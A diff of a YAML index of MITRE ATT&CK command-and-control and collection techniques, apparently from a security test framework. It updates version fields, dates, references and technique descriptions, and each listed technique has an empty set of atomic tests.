         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -37401,7 +37870,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37418,8 +37887,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -37439,7 +37906,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -37462,8 +37929,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -37488,7 +37953,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -37513,8 +37978,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -37579,7 +38042,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -37603,7 +38065,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -37628,21 +38090,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37661,7 +38138,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -37675,6 +38152,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -37688,12 +38170,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -37743,11 +38224,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -37756,20 +38236,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -37794,17 +38274,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -37860,7 +38339,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -37885,7 +38363,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -37922,8 +38400,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -37977,7 +38453,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -38049,33 +38524,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -38083,23 +38537,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -38146,7 +38638,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -38206,7 +38697,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -38238,7 +38728,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -38264,8 +38754,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -38332,7 +38820,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -38430,7 +38917,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -38523,7 +39009,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -38547,7 +39032,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -38570,8 +39055,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -38596,7 +39079,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -38616,8 +39099,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -38671,7 +39152,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -38696,7 +39176,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -38722,8 +39202,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -38777,7 +39255,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -38853,7 +39330,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -38910,7 +39386,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -39004,7 +39479,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -39083,7 +39557,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -39122,7 +39595,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39137,30 +39610,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39169,13 +39622,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -39189,20 +39646,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39245,7 +39719,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -39270,7 +39743,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
